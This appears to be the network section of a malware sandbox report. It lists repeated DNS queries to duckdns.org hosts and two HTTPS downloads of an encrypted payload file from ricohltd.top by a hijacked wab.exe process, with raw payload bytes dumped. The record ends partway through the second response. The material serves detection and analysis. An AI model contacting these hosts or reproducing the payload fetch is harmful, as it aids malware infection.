                                              May 1, 2024 18:22:59.411839962 CEST8.8.8.8192.168.2.220x34cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.529880047 CEST8.8.8.8192.168.2.220xbf6fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.624274969 CEST8.8.8.8192.168.2.220xbf6fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.720175982 CEST8.8.8.8192.168.2.220xbf6fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.816102028 CEST8.8.8.8192.168.2.220xbf6fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.913434982 CEST8.8.8.8192.168.2.220xbf6fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.024559975 CEST8.8.8.8192.168.2.220xfb49Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.119709015 CEST8.8.8.8192.168.2.220xfb49Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.214159966 CEST8.8.8.8192.168.2.220xfb49Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.310233116 CEST8.8.8.8192.168.2.220xfb49Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.405514002 CEST8.8.8.8192.168.2.220xfb49Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.178056955 CEST8.8.8.8192.168.2.220x2e2dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.272454977 CEST8.8.8.8192.168.2.220x2e2dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.367062092 CEST8.8.8.8192.168.2.220x2e2dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.461785078 CEST8.8.8.8192.168.2.220x2e2dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.556333065 CEST8.8.8.8192.168.2.220x2e2dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.661776066 CEST8.8.8.8192.168.2.220xacb5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.756064892 CEST8.8.8.8192.168.2.220xacb5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.851047039 CEST8.8.8.8192.168.2.220xacb5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.945348978 CEST8.8.8.8192.168.2.220xacb5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.039629936 CEST8.8.8.8192.168.2.220xacb5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.144368887 CEST8.8.8.8192.168.2.220xf039Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.241518021 CEST8.8.8.8192.168.2.220xf039Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.341957092 CEST8.8.8.8192.168.2.220xf039Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.439994097 CEST8.8.8.8192.168.2.220xf039Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.536464930 CEST8.8.8.8192.168.2.220xf039Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.105372906 CEST8.8.8.8192.168.2.220xcccdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.199976921 CEST8.8.8.8192.168.2.220xcccdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.298685074 CEST8.8.8.8192.168.2.220xcccdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.393147945 CEST8.8.8.8192.168.2.220xcccdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.514738083 CEST8.8.8.8192.168.2.220xcccdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.312961102 CEST8.8.8.8192.168.2.220x63a1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.828043938 CEST8.8.8.8192.168.2.220xa3d9Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.922765970 CEST8.8.8.8192.168.2.220xa3d9Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:11.017503023 CEST8.8.8.8192.168.2.220xa3d9Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:11.112143040 CEST8.8.8.8192.168.2.220xa3d9Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:11.215830088 CEST8.8.8.8192.168.2.220xa3d9Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.476068974 CEST8.8.8.8192.168.2.220x8656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.571408987 CEST8.8.8.8192.168.2.220x8656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.669987917 CEST8.8.8.8192.168.2.220x8656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.783092976 CEST8.8.8.8192.168.2.220x8656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:13.046169043 CEST8.8.8.8192.168.2.220x8656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.740035057 CEST8.8.8.8192.168.2.220xd33eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.835520983 CEST8.8.8.8192.168.2.220xd33eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.934690952 CEST8.8.8.8192.168.2.220xd33eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.030270100 CEST8.8.8.8192.168.2.220xd33eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.125211000 CEST8.8.8.8192.168.2.220xd33eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.231348991 CEST8.8.8.8192.168.2.220x636cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.325886965 CEST8.8.8.8192.168.2.220x636cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.423676014 CEST8.8.8.8192.168.2.220x636cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.520143986 CEST8.8.8.8192.168.2.220x636cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.617027044 CEST8.8.8.8192.168.2.220x636cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.736934900 CEST8.8.8.8192.168.2.220xd9a9No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.831818104 CEST8.8.8.8192.168.2.220xd9a9No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.926796913 CEST8.8.8.8192.168.2.220xd9a9No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.022181988 CEST8.8.8.8192.168.2.220xd9a9No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.117746115 CEST8.8.8.8192.168.2.220xd9a9No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.223251104 CEST8.8.8.8192.168.2.220x69cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.317845106 CEST8.8.8.8192.168.2.220x69cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.412731886 CEST8.8.8.8192.168.2.220x69cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.507664919 CEST8.8.8.8192.168.2.220x69cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.617893934 CEST8.8.8.8192.168.2.220x69cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.726191044 CEST8.8.8.8192.168.2.220xad0Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.822231054 CEST8.8.8.8192.168.2.220xad0Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.916877985 CEST8.8.8.8192.168.2.220xad0Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:20.019217968 CEST8.8.8.8192.168.2.220xad0Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:20.117466927 CEST8.8.8.8192.168.2.220xad0Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:23.006800890 CEST8.8.8.8192.168.2.220x13e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:23.646436930 CEST8.8.8.8192.168.2.220x5d38No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • ricohltd.top

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249161104.21.60.384433336C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-01 16:20:41 UTC172OUTGET /ELFpBDmh152.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: ricohltd.top
                                              Cache-Control: no-cache
                                              2024-05-01 16:20:41 UTC845INHTTP/1.1 200 OK
                                              Date: Wed, 01 May 2024 16:20:41 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 494656
                                              Connection: close
                                              Last-Modified: Mon, 22 Apr 2024 16:13:43 GMT
                                              ETag: "66268cb7-78c40"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 91658
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYhOTYy4wlSwjEUYgFb5Ja%2BNw6AdXce9Q%2FW2PpGsX16XZ9lhf%2BgFfg7k3bB7uwSxc8hSQiGLFJHNK4%2FnmrGxfgMfWAjpVmjUNicBNSQt9Pzby2iOQTj1pp8S%2FsYn%2Ffc%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 87d119b18f782417-IAD
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-01 16:20:41 UTC524INData Raw: 41 72 91 d5 46 b0 aa d4 92 e6 3b ac b2 fa b1 d5 61 b6 e9 00 60 78 08 4f 4a 8f 3d 46 27 86 fe 9e 18 4d 44 02 3c 05 fa f3 0c cf f2 72 31 c3 b2 50 07 c0 a5 d6 ac 76 3d 61 bb 8b 48 fb 36 8e 2c a8 37 27 6e ff f7 c8 58 11 f7 e3 09 a3 ee 5b 55 8f 31 12 df 12 05 27 01 0f 54 79 04 7b 00 32 99 f2 71 3c c1 ab f6 5e bf 29 ce b0 0f c8 15 e9 0b a7 cb 8a 14 05 13 a8 ce 07 fa ed ce e1 27 c6 50 65 2a 25 88 6b dd 9e 98 ef c4 b5 99 d3 11 02 ed 6c d1 3d d5 54 e3 a9 4b 42 65 c7 86 92 19 52 1d cb 3a f8 92 dc 45 fc e7 ed 33 14 d7 08 37 4d 7c c4 79 aa db 63 36 12 95 eb 21 b8 d7 48 cf 07 36 2b 6b 29 24 54 03 6b 9e 5c 3c d3 c5 0c 57 45 cb b6 e7 bd a8 cf 08 35 33 07 e8 80 e3 62 a7 99 13 1f 1c 9d ac cf 4e 96 5b c2 88 f0 69 46 b6 13 c2 39 f0 d0 f2 16 f3 71 87 ef df 94 e0 3e f8 a1 cd
                                              Data Ascii: ArF;a`xOJ=F'MD<r1Pv=aH6,7'nX[U1'Ty{2q<^)'Pe*%kl=TKBeR:E37M|yc6!H6+k)$Tk\<WE53bN[iF9q>
                                              2024-05-01 16:20:41 UTC1369INData Raw: 70 f0 fe 59 1c 1d 1b fa 42 83 b2 d5 1c 67 ea ae 84 27 8f ad ba f4 6f 73 21 7e b4 d0 cd 51 e4 fe bb 36 a3 f3 fe 62 d6 2a 3c 50 4a 95 61 59 a3 0c a0 be ee 56 dc 94 fe 34 11 9e d6 5d 50 1f 22 41 14 b9 08 17 29 d0 7b 8a 01 de 78 86 c9 08 80 1c 8b 14 1b 3e 1d b2 38 17 78 2b 31 26 0e a2 1b f6 98 b4 18 49 e5 6a 16 82 3e 3f 15 82 53 c9 6d 93 ed 71 d5 71 85 7a 98 9d 87 85 d4 37 8d 40 1f 39 41 81 93 77 a3 cf e8 9a e0 99 37 3f 5a b3 ca 47 10 67 87 7a ea 63 59 a3 6a 96 78 72 83 35 3d 86 94 95 c5 1b 9b 7d 84 4b 59 7a c3 67 4f 0c d8 d4 95 68 1a 97 6a 26 08 eb fc 97 ca e7 cb 2a 50 af ba 75 0b 3c 5e 06 0f 50 7a bf 8d ec 58 ea 1a 99 65 37 3d 10 0e 09 13 bc 5a 39 02 e2 d9 dd e4 2c da f6 10 5c 25 bb d9 d4 68 79 4c 4b 48 83 11 ae ee 2b 0f 5c d9 e3 78 0a 9d 2a 31 bf 3b b1 bc
                                              Data Ascii: pYBg'os!~Q6b*<PJaYV4]P"A){x>8x+1&Ij>?Smqqz7@9Aw7?ZGgzcYjxr5=}KYzgOhj&*Pu<^PzXe7=Z9,\%hyLKH+\x*1;
                                              2024-05-01 16:20:41 UTC1369INData Raw: 7a 95 a5 f3 f4 c8 30 88 73 a6 09 4b 2a 90 56 8f d0 d1 66 f2 51 60 01 e7 8a 74 04 7b 68 91 19 b7 71 d4 e4 9f f5 5e e6 ea 77 c8 5a 8f 15 01 83 aa cb 8a 7c a8 93 ed ce ef f5 d9 cd e1 76 04 3a 65 9d c2 66 22 dd c2 19 11 e5 0d f0 28 5c 66 b9 ec 4f 7d f6 24 c8 05 46 30 bd 32 f3 b6 78 d4 03 97 4e d8 98 78 e5 cb 92 6b cc 4e ba 28 2a c1 96 fc 42 82 bf ee 5a 12 98 e1 6d 73 57 0d cf ef ff 18 0c b2 c6 ba ca fe 70 23 1c 43 10 cb 47 e9 59 c8 9b e6 bf b1 3b a7 33 f9 39 e6 2d b0 13 60 c6 38 4b 91 8b 08 20 34 c9 bc 49 57 0b 38 97 81 c8 c7 0b 8a 08 fc e2 88 52 c8 91 89 d6 17 85 5b f0 14 7f b9 f9 3f 25 35 50 dd 55 2b bc c6 ea 06 4d 54 f0 94 d7 b5 54 d3 2d e8 26 0c ff c6 72 05 bd a5 2a 55 c6 7a 29 23 82 f9 13 e4 1f 01 bd 6c c9 c7 d8 c6 c2 32 21 15 64 16 47 9b b9 ff d3 98 5d
                                              Data Ascii: z0sK*VfQ`t{hq^wZ|v:ef"(\fO}$F02xNxkN(*BZmsWp#CGY;39-`8K 4IW8R[?%5PU+MTT-&r*Uz)#l2!dG]
                                              2024-05-01 16:20:41 UTC1369INData Raw: 3b 93 63 09 ec 10 21 48 50 e9 48 80 ca 10 01 4d 19 74 3e 02 a4 e0 ef fe f0 de 70 dd 31 cd da 12 e8 f9 d2 2d 82 89 9e 7f a3 99 5d 5e 03 90 a8 db 01 69 f5 bc 8d 26 5d 11 dd 06 f1 84 7c ac 98 78 ab 7b a8 7a 7b be 3a cf 7b 35 61 d4 29 28 8b b2 24 69 8f e7 3f 39 9c 62 b0 45 1e a7 a6 0c 9a 3a ae 9c 72 f6 de 82 9b 8c d4 bb 65 28 ee b9 ee a7 a7 20 00 83 70 36 18 9d d9 80 df 70 64 1f 2c 1c 37 a5 71 b8 46 9c f5 2f 32 13 1a ab 5c 3f 79 32 ac 45 fc 85 fc ab 73 f8 26 67 8c 8c d3 bf 0a 70 a6 cd f9 07 4f cc c7 e7 27 ef ff bc c9 cc 6b 2c 1f 21 b8 b2 99 2a e1 4d 4c 63 c6 ce 6f a6 f1 56 d3 64 b8 47 a9 21 49 b5 e8 67 ff 33 3b 08 dd 29 88 13 01 6d c9 21 21 fd 22 4d 7b 6b 8d 68 46 9e 74 9e e7 52 0b b4 5f 91 ac 58 6f b3 29 7c 01 4c 9b 9c 0e df 20 09 50 19 46 03 e6 e2 9a b1 4f
                                              Data Ascii: ;c!HPHMt>p1-]^i&]|x{z{:{5a)($i?9bE:re( p6pd,7qF/2\?y2Es&gpO'k,!*MLcoVdG!Ig3;)m!!"M{khFtR_Xo)|L PFO
                                              2024-05-01 16:20:41 UTC1369INData Raw: 63 60 b9 b5 34 8a aa 4e 28 fa 36 a3 ac ed f6 3d 89 5a dd a5 e4 9e 93 e7 ea a8 08 91 63 c7 8b df b2 8d e7 69 3d 11 ad 84 1a fd 89 97 ce af 7d 10 27 19 31 c1 f2 d6 50 52 b4 42 98 7e a7 20 05 fa 61 72 cf 5a 54 8f 9c a8 bf bf 5c 8f eb f8 72 b1 cc c6 03 04 a6 64 9d b0 db ca 3f c7 e5 58 a2 16 9a 74 fb 86 d3 d6 1a 37 36 32 4e cd 5d 5a 64 d2 48 77 2f 3b 01 51 2c ff 00 a8 b6 bd e6 e1 fa 47 bb a9 69 9a a0 02 91 4c b2 85 8f 65 44 5f 49 f8 9a 26 36 c6 52 c3 f1 e3 fc 5d aa d4 5d f0 ca ff 06 88 6a a9 86 7a ad 46 87 6b e5 df 40 ce 28 cb 3f c8 0b bc 45 59 8b 3e 20 eb ea e4 b1 93 f6 e3 74 d5 0e 5c 1a 43 4a 49 37 a0 ee 84 68 d1 96 f6 bc 8a 61 a3 9e 22 f1 2a bc 3e 7f ce d1 ed b4 36 39 be 3e 0f 57 ca be ea 23 a7 50 24 2a 09 37 4d 2c e8 68 e6 4a b9 49 55 20 bc 57 aa 38 14 53
                                              Data Ascii: c`4N(6=Zci=}'1PRB~ arZT\rd?Xt762N]ZdHw/;Q,GiLeD_I&6R]]jzFk@(?EY> t\CJI7ha"*>69>W#P$*7M,hJIU W8S
                                              2024-05-01 16:20:41 UTC1369INData Raw: fa 68 5f d1 00 ea 21 cd ec e5 e8 14 d4 ea d2 bd 45 d2 12 46 87 b2 d5 97 8f 61 61 07 5a 8f a5 c9 47 82 94 23 85 4b 5b c5 10 b5 75 74 de 46 0e 01 9d 86 a1 f7 b8 97 68 9e a6 f3 e4 f7 4c 11 a9 71 24 97 a7 4d 76 1b a0 da 91 ac b1 9f 62 5e ff ea 5f 81 75 51 32 72 8b c9 08 d9 4c 00 df f3 bf e3 4d c7 9c 90 c3 5e 4b 20 d0 fc b1 ec 5e d7 a1 c9 ed e8 7d b5 64 9b 72 bb 22 92 6c 12 8c c6 fa 4e f3 88 75 53 86 d4 37 06 15 1f b2 ce eb 93 5d 8d 22 99 06 0a 67 c8 c0 41 b0 97 1c d2 73 80 fa 96 49 5d a3 3c ed 8f 06 d1 66 d5 2b 97 95 c5 90 43 fe bf 5b 6b 3e 96 2c af 90 ed 5a 6a 97 99 eb 47 32 08 60 14 6c 88 e7 42 6c 74 bf cc 9e f2 48 7a 12 5f b8 f6 b3 8d ec 01 ba 4f 71 26 c5 c2 2f a3 aa 79 5e 3d c1 cc a2 b9 20 90 08 ce 9e e5 a1 da 40 52 1c 80 06 48 4b 48 de 4a 25 20 c3 55 5f
                                              Data Ascii: h_!EFaaZG#K[utFhLq$Mvb^_uQ2rLM^K ^}dr"lNuS7]"gAsI]<f+C[k>,ZjG2`lBltHz_Oq&/y^= @RHKHJ% U_
                                              2024-05-01 16:20:41 UTC1369INData Raw: 7a 36 d9 f0 ef 53 49 63 4f f8 17 5e 75 8c fb aa 0a 5c 11 78 2d e1 a3 15 a4 55 43 e1 5e 81 54 05 cf dc 26 17 79 c8 f8 7c 16 9d f2 22 b7 18 df df b6 37 d0 31 4f 36 8c 31 e1 79 b9 9d 01 df ed 69 51 31 f8 71 26 45 11 c7 af a9 9a db 39 02 5e a9 0e 9d 7c 93 09 28 9e 37 21 8b c4 e3 8c f1 24 c7 91 a7 c9 ec 56 a2 f1 78 b7 07 80 42 53 3f 82 a3 fc ca 6b 98 83 46 d7 4a 32 5c f7 9f 0a 57 34 e1 e0 67 6a ca 47 e7 1e 27 9e 35 2b 0f 59 ad f9 5f b5 5b 22 68 36 93 8c 67 cc 04 43 bc 33 9f 48 c4 30 6d b6 f7 e6 fe ec 2f 21 00 31 e2 fa 63 22 8a 93 71 57 ad f7 ce 4d 9d bf 9c 88 a6 9a e0 68 d1 0e a4 ce 5d a5 f6 1f 00 53 18 be 40 47 06 a8 00 e0 9e 31 ec 03 67 75 12 a0 71 66 1d cb 1d f8 43 ae d5 21 e0 21 f3 46 be 75 45 25 05 a8 39 dc e9 8d e2 d9 84 08 88 be 2c 73 97 b3 28 eb 92 73
                                              Data Ascii: z6SIcO^u\x-UC^T&y|"71O61yiQ1q&E9^|(7!$VxBS?kFJ2\W4gjG'5+Y_["h6gC3H0m/!1c"qWMh]S@G1guqfC!!FuE%9,s(s
                                              2024-05-01 16:20:41 UTC1369INData Raw: a7 63 8c 43 c3 4c 3c 3a 80 85 b4 cb bc 3c 6a 04 5e 83 84 74 35 3f 38 ec 57 01 76 ab a2 7c 39 66 13 88 bf 2f f3 fd 56 a6 7c 5f 53 e9 06 25 34 5e 1d ad 5b 50 28 b1 ac af e4 e4 f7 48 85 fd bc 8f 17 dd 20 f9 e2 ba de 5b a0 29 aa ab 60 7d fa bf eb 75 8b 5f cc 97 c6 21 28 da d1 7f 65 a2 59 65 fb 98 6d dd 18 1f a7 a6 15 f1 ca af 93 f7 d9 1d 86 9b e5 c2 3f 4f 6f 56 12 31 03 26 2c 63 fe 61 32 f1 e1 26 95 db 68 6d 3b d7 c0 cf ce 36 b8 95 c5 d2 6a cd 8f 67 a2 b4 df ce 73 b3 88 7f 89 b3 23 57 46 27 0d 8d 25 cd bb f9 ed 7f c2 95 ff cc 08 9b 73 49 fd 2f eb 1c 74 14 62 10 cd 97 71 ca 7f 5f b8 91 e8 2f c9 b2 d7 81 8d 61 9b ca 40 46 12 b9 5d 2b 7a e5 d9 b0 74 a0 b6 73 6e 06 86 bd 97 d4 02 35 30 a8 1d a5 ba 02 a6 8c e7 3c 2d 80 7b d4 89 e2 ef 9a 4c 8f 7c 1a ea 27 50 f3 c2
                                              Data Ascii: cCL<:<j^t5?8Wv|9f/V|_S%4^[P(H [)`}u_!(eYem?OoV1&,ca2&hm;6jgs#WF'%sI/tbq_/a@F]+ztsn50<-{L|'P
                                              2024-05-01 16:20:41 UTC1369INData Raw: 09 4d ba d7 86 87 cf 43 bf d8 a3 8b 11 c5 06 ef f2 cf f5 21 12 7a 2e e0 c9 b6 5e 5e b3 05 a6 5a 16 32 66 b4 a8 25 47 77 3f ff 49 b2 18 8d b6 1f ca 88 15 d8 67 8d 68 db 29 e1 55 ce 95 a1 73 4a 5d fc ef b1 c9 91 2f 8f 8c 19 10 e4 76 6e 15 7f 43 d0 da 44 a1 9d 74 54 3a d5 3d 0f 6f fc c8 99 2e 8b 9f 9c ca 17 52 44 53 86 b1 29 5f 7e 82 70 a3 c0 8f c9 32 0d f2 42 63 40 ac e3 d0 87 e6 2f 88 94 00 74 73 62 e9 d7 c2 88 7f bb a1 69 6c 4e fd 6e 39 c1 eb 1c 76 af 08 49 8c 1f ea a7 3a 26 e7 66 5f 5f 50 91 16 c2 10 41 31 ee 11 e3 f5 a2 01 32 0d 31 fd 19 ab 7e f3 58 ef cf 8f c7 ef ad 51 97 10 dd 60 24 d7 ae 06 86 0d 63 a6 de 35 3e 32 92 d2 e9 6d af 6c 21 58 50 b1 37 d1 84 98 39 ea fe ac 51 d6 89 cc fa a9 14 e2 66 5f 34 2e 8f ea d4 8a 9e 64 81 ad e4 e1 4e a8 3b 7e f2 aa
                                              Data Ascii: MC!z.^^Z2f%Gw?Igh)UsJ]/vnCDtT:=o.RDS)_~p2Bc@/tsbilNn9vI:&f__PA121~XQ`$c5>2ml!XP79Qf_4.dN;~
                                              2024-05-01 16:20:41 UTC1369INData Raw: e1 04 5b 9b 05 45 71 30 bc 32 38 10 88 42 e3 fb 15 f6 58 ce de e8 2c d4 e2 d2 aa 31 2d 12 92 6a 4d 2a 4c ec 24 46 0c ce 70 52 b9 a3 3a 9b bd a7 4b 2f 4e 95 e8 a9 80 42 87 ef 8b 43 5d e4 d4 3f a3 6a 9e d4 af 37 25 65 e1 13 2b 6b 55 4f a6 ce 3e 00 cc 91 d8 11 fc 9e d5 e8 d6 49 67 01 4d fe 64 6e 85 e1 7f e3 88 d7 90 f0 4d 5a 7a fe a7 d4 61 ae 28 0d 80 68 6f 11 14 c2 9d 46 ff c6 ce 50 ef df 0c 38 aa cd b6 c5 c0 71 0e b4 70 e2 68 7a 2b fb 06 41 dc 6c 8a 6d 10 4a 81 aa fc f7 0c dc 27 6f f6 01 22 b8 ef fc cd 72 67 69 11 f3 82 ce a2 8d 7c 6c 64 6d 8e 6a b0 0b 64 08 88 a3 cd 92 3c 58 ea 35 bc 2a 91 20 4a 7f 1b fa f7 14 7f 23 c1 ba 09 24 50 fe eb d8 86 60 7a 16 5a 06 2d ec 06 15 b0 e7 f5 66 da bc 49 f4 08 e5 39 f1 1a 1c ea 1d 07 20 1b d3 ae 52 37 d7 ea ec 31 fa 98
                                              Data Ascii: [Eq028BX,1-jM*L$FpR:K/NBC]?j7%e+kUO>IgMdnMZza(hoFP8qphz+AlmJ'o"rgi|ldmjd<X5* J#$P`zZ-fI9 R71


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249204172.67.191.1124432208C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-01 16:22:20 UTC172OUTGET /ELFpBDmh152.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: ricohltd.top
                                              Cache-Control: no-cache
                                              2024-05-01 16:22:20 UTC841INHTTP/1.1 200 OK
                                              Date: Wed, 01 May 2024 16:22:20 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 494656
                                              Connection: close
                                              Last-Modified: Mon, 22 Apr 2024 16:13:43 GMT
                                              ETag: "66268cb7-78c40"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 35249
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8zgJxnkNsIXA5Rbi4jtvqk3xmTIwFJssm4Ys%2FDOA1g4ge7e09lbL%2BgDgxwq7udfdaNQZV%2BkSOz4sRcZeaKX07If1r4T8zi1YmKd%2BnK55jGokAMktju7dJgMQAJVjNQ%3D"}],"group":"cf-nel","max_age":604800}
